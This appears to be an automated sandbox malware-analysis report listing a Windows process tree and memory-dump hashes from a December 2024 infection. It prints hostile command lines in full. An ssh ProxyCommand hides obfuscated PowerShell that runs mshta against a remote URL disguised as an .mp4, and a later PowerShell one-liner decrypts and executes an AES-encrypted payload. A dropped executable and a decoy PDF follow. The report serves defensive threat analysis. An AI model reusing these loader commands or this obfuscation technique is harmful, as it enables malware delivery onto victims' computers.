                                                                                    Imagebase:0x7ff620390000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:02:38:11
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp
                                                                                    Imagebase:0x7ff6edb70000
                                                                                    File size:946'176 bytes
                                                                                    MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:02:38:11
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/BU]]]X6P]]]].mp4]]' -replace ']')
                                                                                    Imagebase:0x7ff7b2bb0000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:02:38:13
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://static.klipxuhaq.shop/BUX6P.mp4"
                                                                                    Imagebase:0x7ff7b2bb0000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:02:38:14
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/BUX6P.mp4
                                                                                    Imagebase:0x7ff6e42b0000
                                                                                    File size:14'848 bytes
                                                                                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:8
                                                                                    Start time:02:38:17
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                    Imagebase:0x7ff620390000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:9
                                                                                    Start time:02:38:18
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function albv($AuxRS){return -split ($AuxRS -replace '..', '0x$& ')};$JqlQ = albv('A2C48681D2459656E4692303B9BC7CFF6E08A10A018431979198D25A52F894F6DC443732B0C3354905BE975423F38084D2727CBF0DAC9B616709F076910568402E1B28EF5D32B51C2AC725A34041CB2C720AC989DB2E62000FD988905E1A6389FB0D52E37D7C2115DD226B708311260031E5FE6BC8BC5E87908C3714AABD2F115C12D362819A4E916FEED235A129FBF323D36DE4AD902E8C8A51A233D5853E42F28657DE3ED15211BFE6941DBD1C7F025630974368A83FD5DE963EF1E91EFD56DBFA68AD8063783D6639F87D1FE6BFD099BBE5A6D9601EF7EC17FDA43D8AE527D0296119AD7EBF32FD111A12DBB01041DEB9BAD02400A8B21A164E61A0C5EEBF6EBA6731A52636245A483B65EF09C62369BF5F6779155AFF4AE3C49130512D33C4A447294185B0AF3F2DC5BFD7040C32F45793CA424E8DC070D428B1E88AE756B7D81C20E90E56A70C92C46B646DB06D5D809F597FCB0B2A835686434F9B8EE1346022A7E67A5FF1E93282DD685DDBA750B164855122CFE1595D8D4C626CCDC95D069D378F11D1D01CEE44578BB248B707DF3936CE1150D5A850E2C59D2B6EA91D541C5FA289284F984D5EF5F1BBAE1C95E6CD4D479D18168F4F5A1F6A3D2516C97548490FE4EDE1E8FBD46026BF7C44F92B74E23BFF805094490DB237A8FBA52231FA45C8D0CADE12CE630F42AD7D6C814EAC9911B70168A211C18F648329E6E5D0E31F6A222BA929C78E74D5A726AB7BD0489D0E553EAA929C4C481CF50DF1B3A85B394D77767C3D76038DF4EF9DF6DDCF5254204467B039593F4A73AA3964076F9237DB55DC43BAE2E0A12466D7F7BA453418AA783574D20BD5A3ED874800B10605DEAA6FC471AB3B4A8822C688A244DA7A4CB28555DF5FFD93045A4154386BDC999322DC1D7DAD002E13C7B2273236812A6E335C1646D87460F8997E340C4EF0B462C6F9E2A290FD703294DE51C6349EC9DA9CED11400F78CCFFA21F2B7A01319F1AF67BD8795B27F817E01A0EE0045366397548B1C18343E85D61F0E81F6554E60F30C03986021E0B29EEBACFD5A055F6A04BDE3FB67D9F1BBF0C59CD41D646FF685434E25B463EFFB769528BEE');$PUPw=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((albv('45625942537170514679715A53476565')),[byte[]]::new(16)).TransformFinalBlock($JqlQ,0,$JqlQ.Length)); & $PUPw.Substring(0,3) $PUPw.Substring(257)
                                                                                    Imagebase:0x7ff7b2bb0000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:10
                                                                                    Start time:02:38:18
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff620390000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:11
                                                                                    Start time:02:38:22
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Mcyga.pdf"
                                                                                    Imagebase:0x7ff64eb90000
                                                                                    File size:5'641'176 bytes
                                                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:12
                                                                                    Start time:02:38:23
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                    Imagebase:0x7ff63ec50000
                                                                                    File size:3'581'912 bytes
                                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:13
                                                                                    Start time:02:38:23
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1632,i,3400074222581117938,16656895389313698279,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                    Imagebase:0x7ff63ec50000
                                                                                    File size:3'581'912 bytes
                                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:18
                                                                                    Start time:02:38:46
                                                                                    Start date:17/12/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\bdd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\bdd.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:14'104'424 bytes
                                                                                    MD5 hash:1B4971205E6226DF6B9B11527F70A14F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:Borland Delphi
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Has exited:true

                                                                                    Reset < >
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1389974165.00007FF7C0D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ff7c0d70000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                      • Instruction ID: 8c1a5c164e49f01627a38da25fc1f231b32b1d6da8258a97a09e23c96a463f7d
                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                      • Instruction Fuzzy Hash: 3801847050CB084FD744EF0CE451AA5B7E0FB89360F10056EE58AC3651D722E881CB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1380203237.00007FF7C0D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0D60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff7c0d60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction ID: b7b0eb32f0ad35282b72393bbef1acd5a2b623372bb79b0467e015fa915e5eb6
                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction Fuzzy Hash: 7B01843050CB084FD744EF0CE451AA5B7E0FB85360F10056EE58AC3651DB22E882CB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000003.1957365202.0000021129B70000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000021129B70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_3_21129b70000_mshta.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                                                                      • Instruction ID: d25dd3b60c7f827ad0b121a038d4014dbab109ae77095f72bc0e304aefbc6259
                                                                                      • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                                                                      • Instruction Fuzzy Hash: FD90021549546A55D41815950C596DC50406398150FD849814916D4148D46D02A62152
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000003.1957365202.0000021129B70000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000021129B70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_3_21129b70000_mshta.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                                                                      • Instruction ID: d25dd3b60c7f827ad0b121a038d4014dbab109ae77095f72bc0e304aefbc6259
                                                                                      • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                                                                      • Instruction Fuzzy Hash: FD90021549546A55D41815950C596DC50406398150FD849814916D4148D46D02A62152
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000003.1957365202.0000021129B70000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000021129B70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_3_21129b70000_mshta.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                                                                      • Instruction ID: d25dd3b60c7f827ad0b121a038d4014dbab109ae77095f72bc0e304aefbc6259
                                                                                      • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                                                                      • Instruction Fuzzy Hash: FD90021549546A55D41815950C596DC50406398150FD849814916D4148D46D02A62152
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000003.1957365202.0000021129B70000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000021129B70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_3_21129b70000_mshta.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                                                                      • Instruction ID: d25dd3b60c7f827ad0b121a038d4014dbab109ae77095f72bc0e304aefbc6259
                                                                                      • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                                                                      • Instruction Fuzzy Hash: FD90021549546A55D41815950C596DC50406398150FD849814916D4148D46D02A62152
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000003.1957365202.0000021129B70000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000021129B70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_3_21129b70000_mshta.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                                                                      • Instruction ID: d25dd3b60c7f827ad0b121a038d4014dbab109ae77095f72bc0e304aefbc6259
                                                                                      • Opcode Fuzzy Hash: e0901e968e2741f1c925d864470624e459c39a6dd1a3a093616f0dca7dc7d249
                                                                                      • Instruction Fuzzy Hash: FD90021549546A55D41815950C596DC50406398150FD849814916D4148D46D02A62152
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1946112282.00007FF7BFD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_7ff7bfd80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 33ce55459abfa18a6e12346ef04e2293513cc13d9a0d2ee98c09f45ccdb24b94
                                                                                      • Instruction ID: 1bc267b1f9dd270f1205ab22e88ca7ff4ad0f394c7c4fc971281e139e8e8fe5c
                                                                                      • Opcode Fuzzy Hash: 33ce55459abfa18a6e12346ef04e2293513cc13d9a0d2ee98c09f45ccdb24b94
                                                                                      • Instruction Fuzzy Hash: 20610962E0DEC64FE799A76C58391F9F6D2EF66A60FC802BEC10DC31D7DD0998148291
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1946112282.00007FF7BFD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_7ff7bfd80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0b8710dce1d3eccb9d478e50d549fc91ba263dd10c07dd7e5e6caf1f15082b28
                                                                                      • Instruction ID: f4a0f44a00609bd1da197afbb8aaa2aff2a3538d74abde6aa3a9814905d1605b
                                                                                      • Opcode Fuzzy Hash: 0b8710dce1d3eccb9d478e50d549fc91ba263dd10c07dd7e5e6caf1f15082b28
                                                                                      • Instruction Fuzzy Hash: 1B41B562E0EEC74BE299A7BC08792F8A6D1EF66A60BD802B9C10DC35D6DD1998144251
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1946112282.00007FF7BFD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_7ff7bfd80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8b13a57c1b7782ffc1d8d1063d82113de1e397d9d9d7ec8def0ce396136595d9
                                                                                      • Instruction ID: 01ecc910a0bc31f6c3ab4df985229fe62af556ec3ce4b557729d7ee60ad19485
                                                                                      • Opcode Fuzzy Hash: 8b13a57c1b7782ffc1d8d1063d82113de1e397d9d9d7ec8def0ce396136595d9
                                                                                      • Instruction Fuzzy Hash: 2501A272E0C9494FB2A4A65CA45A1F8A2C1EF95630BD802B6D14DC318ADE15BC2242C6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1945096381.00007FF7BFCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFCB0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_7ff7bfcb0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                      • Instruction ID: 50f6a4ec65743ec04bda53966f428192bd4d24fe3369a1908b2ef26a3bea396d
                                                                                      • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                      • Instruction Fuzzy Hash: AE01A73110CB0C4FD744EF0CE051AA5B3E0FB95360F10052DE58AC3651D732E881CB41
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1946112282.00007FF7BFD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_7ff7bfd80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a9b5f1a3efdc1ea4a84663ebfdb78efec53128488c43febf6ca6002308c00cd1
                                                                                      • Instruction ID: b5cb8a3f1769a761fd1e279ab42ccb1ff14b3da650985f3adbf8ee2c0ae68aac
                                                                                      • Opcode Fuzzy Hash: a9b5f1a3efdc1ea4a84663ebfdb78efec53128488c43febf6ca6002308c00cd1
                                                                                      • Instruction Fuzzy Hash: 19E0D833E4D8A90EB7A6B5DC242D1F8A2C1EF65631B8402B7D50DD3149DD049C1043E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1946112282.00007FF7BFD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFD80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_7ff7bfd80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4b294359c335a389e9d7b24a2254868b891e21ed126a99881f363a43506e7d8e
                                                                                      • Instruction ID: 3557f04491af9af1176d46d48161f3698dae901b153117aeea1bad5b0a27ce85
                                                                                      • Opcode Fuzzy Hash: 4b294359c335a389e9d7b24a2254868b891e21ed126a99881f363a43506e7d8e
                                                                                      • Instruction Fuzzy Hash: CD029A31A0DACA4FD786EB6C84696F4BBE1EF67710B4802FED14DC7197CA189809C391
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000012.00000002.1731556429.0000000000502000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000012.00000002.1731526515.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1731556429.000000000040D000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1731556429.000000000048A000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1731556429.00000000005EB000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1731556429.000000000072F000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1731556429.00000000007FD000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733083659.0000000000CEE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733125184.0000000000CF1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733190642.0000000000CF8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733190642.0000000000CFB000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733273583.0000000000CFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733300808.0000000000D01000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733338695.0000000000D04000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733387423.0000000000D07000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733490229.0000000000D13000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733534698.0000000000D19000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733619186.0000000000D25000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733663395.0000000000D28000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733722164.0000000000D2C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733765198.0000000000D2F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733823435.0000000000D44000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733955637.0000000000DA3000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733955637.0000000000DA7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733955637.0000000000DA9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1733955637.0000000000DAD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1734099664.0000000000DF3000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      • Associated: 00000012.00000002.1734177874.0000000000DF9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_18_2_400000_bdd.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63641e619a1ebfb2d67102de08a66a2d6436829a5a2663a6a13eff08e7189dd5
                                                                                      • Instruction ID: 07242ce6c80bf51b08c2cff10bd8e37dda8d9b6e3685e1347264c3990b947222
                                                                                      • Opcode Fuzzy Hash: 63641e619a1ebfb2d67102de08a66a2d6436829a5a2663a6a13eff08e7189dd5
                                                                                      • Instruction Fuzzy Hash: 56F02B36215BC4CCD7609F36D8817DA3BA9F349B88F14842ADA8D9BB28DF30D2549745